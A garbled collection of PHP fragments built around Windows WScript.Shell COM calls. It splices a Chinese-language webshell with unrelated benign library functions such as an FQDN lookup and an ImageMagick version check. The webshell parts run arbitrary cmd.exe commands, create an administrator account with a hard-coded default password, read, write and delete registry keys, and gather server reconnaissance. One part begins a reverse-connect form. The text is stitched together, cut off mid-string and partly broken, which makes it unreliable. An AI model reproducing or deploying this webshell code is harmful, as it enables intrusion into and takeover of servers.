$adminmail = isset($_SERVER['SERVER_ADMIN']) ? "<a href=\"mailto:" . $_SERVER['SERVER_ADMIN'] . "\">" . $_SERVER['SERVER_ADMIN'] . "</a>" : "<a href=\"mailto:" . get_cfg_var("sendmail_from") . "\">" . get_cfg_var("sendmail_from") . "</a>";
if ($dis_func == "") {
$dis_func = "No";
} else {
$dis_func = str_replace(" ", "<br>", $dis_func);
$dis_func = str_replace(",", "<br>", $dis_func);
}
$phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No";
$info = array(array("服务器时间", date("Y年m月d日 h:i:s", time())), array("服务器域名", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", $_SERVER["REMOTE_ADDR"]), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("服务器管理员", $adminmail), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen")));
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '<table width="100%" border="0">';
for ($i = 0; $i < count($info); $i++) {
echo '<tr><td width="40%">' . $info[$i][0] . '</td><td>' . $info[$i][1] . '</td></tr>' . "\n";
}
try {
$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
} catch (Exception $e) {
}
echo '<tr><td width="40%">Terminal Service端口为</td><td>' . $registry_proxystring . '</td></tr>' . "\n";
echo '<tr><td width="40%">Telnet端口为</td><td>' . $Telnet . '</td></tr>' . "\n";
echo '<tr><td width="40%">PcAnywhere端口为</td><td>' . $PcAnywhere . '</td></tr>' . "\n";
echo '</table>';
break;
case "nc":
$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
print <<<END
<form method="POST">
<div class="actall">使用方法:<br>
/**
* Returns the fully-qualified domain name of the server
*
* @internal
*
* @return string The fully-qualified domain name of the server
*/
public static function getFQDN()
{
if (self::$fqdn !== NULL) {
return self::$fqdn;
}
if (isset($_ENV['HOST'])) {
self::$fqdn = $_ENV['HOST'];
}
if (strpos(self::$fqdn, '.') === FALSE && isset($_ENV['HOSTNAME'])) {
self::$fqdn = $_ENV['HOSTNAME'];
}
if (strpos(self::$fqdn, '.') === FALSE) {
self::$fqdn = php_uname('n');
}
if (strpos(self::$fqdn, '.') === FALSE) {
$can_exec = !in_array('exec', array_map('trim', explode(',', ini_get('disable_functions')))) && !ini_get('safe_mode');
if (fCore::checkOS('linux') && $can_exec) {
self::$fqdn = trim(shell_exec('hostname --fqdn'));
} elseif (fCore::checkOS('windows')) {
$shell = new COM('WScript.Shell');
$tcpip_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip';
try {
$domain = $shell->RegRead($tcpip_key . '\\Parameters\\NV Domain');
} catch (com_exception $e) {
try {
$domain = $shell->RegRead($tcpip_key . '\\Parameters\\DhcpDomain');
} catch (com_exception $e) {
try {
$adapters = $shell->RegRead($tcpip_key . '\\Linkage\\Route');
foreach ($adapters as $adapter) {
if ($adapter[0] != '{') {
continue;
}
try {
$domain = $shell->RegRead($tcpip_key . '\\Interfaces\\' . $adapter . '\\Domain');
} catch (com_exception $e) {
try {
$domain = $shell->RegRead($tcpip_key . '\\Interfaces\\' . $adapter . '\\DhcpDomain');
} catch (com_exception $e) {
}
}
}
} catch (com_exception $e) {
}
}
}
if (!empty($domain)) {
self::$fqdn = '.' . $domain;
}
} elseif (!fCore::checkOS('windows') && !ini_get('open_basedir') && file_exists('/etc/resolv.conf')) {
$output = file_get_contents('/etc/resolv.conf');
if (preg_match('#^domain ([a-z0-9_.-]+)#im', $output, $match)) {
self::$fqdn .= '.' . $match[1];
}
}
}
return self::$fqdn;
}
function winshell()
{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
try {
$registry_proxystring = $shell->RegRead($regpath);
} catch (Exception $e) {
echo '����: ' . $e->getMessage();
}
echo $registry_proxystring;
}
} else {
$tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
}
}
public function getImageMagickVersion()
{
static $version = null;
if (!$version && $this->isWindows()) {
// IM stores this in the registry if you use the installer.
if (class_exists('COM', false)) {
$shell = new \COM('WScript.Shell');
if ($shell) {
$version = $shell->RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\ImageMagick\\Current\\Version');
}
}
}
if (!$version) {
// Old-fashioned way.
exec($this->getImageMagickConvert() . ' -version', $output, $status);
if ($status) {
throw new ImageMagickException('ImageMagick was not found.');
}
$first_line = $output[0];
preg_match('/Version: ImageMagick (\\d+\\.\\d+\\.\\d+)/', $first_line, $matches);
$version = $matches[1];
}
return $version;
}
function StartSendingMessage()
{
if (strlen($this->mailroot_directory) == 0) {
if (function_exists("class_exists") && class_exists("COM")) {
$shell = new COM("WScript.Shell");
$wwwroot = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\InetStp\\PathWWWRoot");
if (is_dir($wwwroot)) {
$mailroot = $wwwroot . "\\..\\mailroot";
if (is_dir($mailroot . "\\Pickup")) {
$this->mailroot_directory = $mailroot;
} else {
$mailroot = $wwwroot . "\\mailroot";
if (is_dir($mailroot . "\\Pickup")) {
$this->mailroot_directory = $mailroot;
}
}
}
}
}
if (strlen($this->mailroot_directory) == 0) {
return $this->OutputError("it was not specified the mailroot directory path");
}
if (!is_dir($this->mailroot_directory . "\\Pickup")) {
return $this->OutputError("the specified mailroot path " . $this->mailroot_directory . " does not contain a Pickup directory");
}
$this->pickup_file_name = tempnam(GetEnv("TMP"), "eml");
if (!($this->pickup_file = @fopen($this->pickup_file_name, "w"))) {
return $this->OutputPHPError("could not create a pickup message file " . $this->pickup_file_name, $php_errormsg);
}
return "";
}
function phpreg()
{
$shell1 = new COM("wscript.shell") or die("require windows host");
$action = isset($_POST['action']) ? $_POST['action'] : '';
echo '<div class="actall"><h5>Windows注册表读写</h5></div>';
print <<<END
<TR><form action="" method="post">
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>
路径:<input type="hidden" name="action" value="读取">
<input type="text" name="rpath" value="{$rpath}" size="70">
<input class="bt" type="submit" value="读取"></form><br></TD></TR></div>
END;
$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
$rpath = str_replace("\\\\", "\\", $rpath);
if ($action == "read") {
$out = $shell1->RegRead($rpath);
echo '<pre>' . var_dump($out) . '</pre>';
}
print <<<END
<TR><form action="" method="post">
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>位置:<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br>
类型:<input type="text" name="wtype" value="{$wtype}" size="20"> 值:<input type="text" name="wvalue" value="{$wvalue}" size="30">
<input type="hidden" name="action" value="write"><input class="bt" type="submit" value="写入"></form></TD></TR></div>
END;
$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
$wpath = str_replace("\\\\", "\\", $wpath);
$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
if ($action == "write") {
$shell1->RegWrite($wpath, $wvalue, $wtype);
}
print <<<END
<TR><form action="" method="post">
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>
位置:<input type="hidden" name="action" value="del">
<input type="text" name="dpath" value="{$dpath}" size="70">
<input class="bt" type="submit" value="删"></form></TD></TR></div>
END;
$dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';
$dpath = str_replace("\\\\", "\\", $dpath);
if ($action == "del") {
$out = $shell1->RegDelete($dpath);
}
}
function winshell()
{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
try {
$registry_proxystring = $shell->RegRead($regpath);
} catch (Exception $e) {
echo '内容: ' . $e->getMessage();
}
echo $registry_proxystring;
}
} else {
$tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
}
}